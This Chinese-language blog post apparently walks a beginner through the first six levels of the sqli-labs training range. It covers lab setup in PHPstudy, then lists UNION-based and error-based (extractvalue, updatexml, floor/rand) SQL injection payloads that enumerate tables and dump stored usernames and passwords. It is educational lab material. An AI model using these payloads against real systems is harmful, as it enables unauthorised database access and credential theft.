sql-lab靶场初级

最新推荐文章于 2024-04-15 18:22:08 发布
最新推荐文章于 2024-04-15 18:22:08 发布
阅读量412 收藏
点赞数 4
分类专栏: 笔记 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lee_maple/article/details/121157579
版权

1.配置环境(PHPstudy)

①打开PHPstudy新建网站

②需要注意修改php版本和端口(不能重复),否则会报错③将含有sql题目的文件放到此目录下

④打开本地网站,进入该页面 ⑤如出现下页面则说明配置完成,开始做题了!

二、sql题目

提示:在URL编码中的符号
(%20)(+) =   空格

(%27)  =   ' 

(0x3a)(0x)为十六进制标志,3a是ASCII中的 :(冒号)

--    单行注释(--后必须加一个空格,否则无法起到注释作用)

#    单行注释

/**/ 多行注释

1、1-4题(联合查询)

①通过联合查询判断注入点

我们由报错信息可知,‘是异常位置并提示’位置

令id为不存在的值,利用联合查询依次查询数据库名称,表名,字段,和敏感数据

-- 数据库名称
?id=-1' union select 1,2 database()

-- 表名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

-- 各字段
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

-- 查询敏感数据
?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+

同理可做2,3,4

原理就是通过报错信息判断该漏洞类型是否为“可联合查询注入”

当查询数据会返回显示界面时可以考虑使用union联合查询的方式

联合查询有两个必要条件:

  • 两张虚拟表具有相同的列数
  • 两张虚拟表对应列的数据类型相同

当可以使用联合查询时,基本步骤为:猜测虚拟表列数->获取数据库名->获取表名->获取列名->获取数据

1、5-6题(联合查询)

继续使用联合查询我们发现内容不会返回显示界面

于是我猜测这是一个报错注入 ,我查询当前版本的报错函数并进行尝试,得到以下结果

之后我查询到以下内容并确定这是一个报错型注入

基于错误的注入:当输入特殊字符页面出现报错信息时则可以考虑使用基于错误的注入

xpath报错
(1) http://192.168.254.132/sqli-labs/Less-1/?id=-1’ and extractvalue(1,concat(user(),0x7e,version()))–+
(2)http://192.168.254.132/sqli-labs/Less-1/?id=-1’ and updatexml(1,concat(user(),0x7e,database(),0x7e,version()),1)–+

group by 报错
http://192.168.254.132/sqli-labs/Less-1/?id=-1’ and (select 1 from (select count(*),concat((select concat(username,password) from users limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x) a )–+

通过extractvalue函数得知数据库名称,之后的步骤与联合查询类似,但使用的sql语句不同

由于回显长度有限,只能用limit分段获取,首先需要查询有几个数据

查到有13个数据,用limit分段获取

分别为0,1  1,1  2,1 以此类推

-- 数据库名称
?id=1' and extractvalue(1,concat(0,(select database()))) --+


-- 表名
?id=1 ' and extractvalue(1,concat(0,(select table_name from information_schema.tables where table_schema=database() limit 3,1))) --+


-- 列名
?id=1 ' and extractvalue(1,concat(0,( select column_name from information_schema.columns where table_schema =database() and table_name='users' limit 0,1 ))) --+


-- 数据
?id=1 ' and extractvalue(1,concat(0,( select concat(id,0x7e,username,password) from users limit 0,1))) --+

第六题同理

枫糖丶
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sql-bypass靶场
03-19
带有过滤的sqli靶场,需要先搭建dvwa靶场,因为要用到dvwa数据库
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
web靶场 --- sqli-labs
L0g1c的博客
07-06 1283
SQL注入的本质是用户输入的数据被当作代码执行mysql语法:查库: 查表:查列:查字段: 查看是否有注入 确实存在SQL注入漏洞查看有多少列先使用 再使用 所以得到users表有3列查看哪些数据可以回显[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-drLNqXTv-1657118499948)(https://raw.githubusercontent.com/Ckingt-k/photos/main/image-20220706192047368.png)]查看当前数
sql-lab靶场讲解
CN天狼
12-16 5454
sql-lab讲解
Sql-lab全解_sqllab,算法太TM重要了
m0_62289956的博客
04-15 1078
id=1’ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’)))–+使用语句admin“) and if(ascii(concat(database()))>0,sleep(5),sleep(10))#如果你能答对70%,找一个安全工作,问题不大。
Sql-labs靶场(1~28)
xhx836161547的博客
12-29 4775
sql注入经典靶场Sql-labs全关详解,正在加急更新中
Sqli-labs靶场搭建(适合新手小白围观)
weixin_72543266的博客
09-12 6147
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
SQL实践之sqli-labs靶场(持续更新)
m0_62102520的博客
07-08 512
总结1、寻找注入点2、判断闭合方式3、验证漏洞4、判断列数及回显位5、取数据取数据库名根据数据库名,取表名根据数据库名、表名,取列名取具体数据。
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sql-lap注入靶场
最新发布
05-02
sql注入练习靶场,实现注入漏洞复现,让你也当一回黑客。安装方法可以自己上网找哦。 使用方法:通过猜解,判断实现密码破解
jupyterlab-sql:JupyterLabSQL GUI
01-30
jupyterlab-sql jupyterlab-sql向JupyterLab添加了一个SQL用户界面: 通过点击界面浏览表 使用自定义查询读取和修改数据库 安装 在JupyterLab 1.x上安装 要安装jupyterlab-sql ,请运行以下命令: pip install ...
sql-lab靶场
weixin_69374202的博客
05-17 160
1、找注入点,开始用1',发现单引号报错,尝试其它符号也不行,注入点不对,干脆去掉单引号,发现没报错,说明这个是注入点2、找列 =3 没有报错,确定是三列3、根据列数写查询数据库的语句(需要把union之前的改为一个查不到的数)
sqli-labs靶场分析
RestoreJustice的博客
03-18 2314
这里是 基于WAF的一个错误引起的SQL注入,源代码level 29文件夹里有三个php文件,默认访问这个文件夹的index.php但这个文件是没有接入“WAF”的。在测试符号后面添加and sleep(5) --+,如果成功闭合前面的语句,则会执行sleep(5),利用延时注入的原理判断闭合方式。来看看第二种格式,第二种格式除了能像第一种格式一样得到数组内元素的值外,还能得到元素的索引值,并保存到$key变量中,如果数组的索引值未经过人工设定,则返回系统默认的设定值。第一个id的值符合规则,WAF放行。
sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 7375
sqli-labs,sql注入,burpsuit
SQL注入练习平台sqli-labs
海枫的专栏
11-04 1万+
你是否在学习SQL注入找不到好的OJ平台,这里介绍sqli-labs项目给你,非常适合SQL注入初学者来这里升级怪兽。
sqlilabs教程(1-10)
热门推荐
一个安全研究员
04-18 3万+
前言 最近在研究sql注入,只是看书有点无聊(不推荐大家去看《sql注入攻击与防御》,这本书的翻译很奇怪,而且内容不太适合小白,可以当小说看) less-1 根据提示,可以知道只是个单引号注入的题目,我们在参数后面加一个单引号看下效果: 可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被...
sql-lib 1-10关
鸣蜩十四的博客
06-14 638
1. 字符型 http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败 http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功 http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库 ht...
sql-lab靶场下载
10-17
您可以在以下网址下载sql-lab靶场:https://github.com/Audi-1/sqli-labs 下载完成后,您可以按照README文件中的说明进行安装和使用。 相关问题: 1. sql-lab靶场是什么?...3. 如何使用sql-lab靶场

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

枫糖丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值